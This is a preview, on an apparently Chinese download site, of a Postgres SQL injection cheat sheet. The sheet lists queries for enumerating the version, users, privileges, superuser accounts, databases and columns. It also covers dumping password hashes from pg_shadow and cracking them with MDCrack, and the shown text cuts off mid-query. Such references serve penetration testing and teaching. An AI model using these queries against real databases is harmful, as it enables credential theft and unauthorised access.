没有合适的资源?快使用搜索试试~ 我知道了~
Postgres数据库SQL注入手册1
资源详情
资源评论
资源推荐
Postgres SQL Injection Cheat Sheet
Some useful syntax reminders for SQL Injection into PostgreSQL databases…
This post is part of a series of SQL Injection Cheat Sheets. In this series, I’ve endevoured to
tabulate the data to make it easier to read and to use the same table for for each database
backend. This helps to highlight any features which are lacking for each database, and
enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet.
I’m not planning to write one for MS Access, but there’s a great MS Access Cheat Sheet here.
Some of the queries in the table below can only be run by an admin. These are marked with “– priv”
at the end of the query.
Version
SELECT version()
Comments
SELECT 1; –comment
SELECT /*comment*/1;
Current User
SELECT user;
SELECT current_user;
SELECT session_user;
SELECT usename FROM pg_user;
SELECT getpgusername();
List Users
SELECT usename FROM pg_user
List Password
Hashes
SELECT usename, passwd FROM pg_shadow — priv
Password
Cracker
MDCrack can crack PostgreSQL’s MD5-based passwords.
List Privileges
SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user
List DBA
Accounts
SELECT usename FROM pg_user WHERE usesuper IS TRUE
Current
Database
SELECT current_database()
List
Databases
SELECT datname FROM pg_database
List Columns
SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type
T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND
Crazyanti
- 粉丝: 16
- 资源: 303
上传资源 快速赚钱
- 我的内容管理 展开
- 我的资源 快来上传第一个资源
- 我的收益 登录查看自己的收益
- 我的积分 登录查看自己的积分
- 我的C币 登录后查看C币余额
- 我的收藏
- 我的下载
- 下载帮助
安全验证
文档复制为VIP权益,开通VIP直接复制
信息提交成功
评论0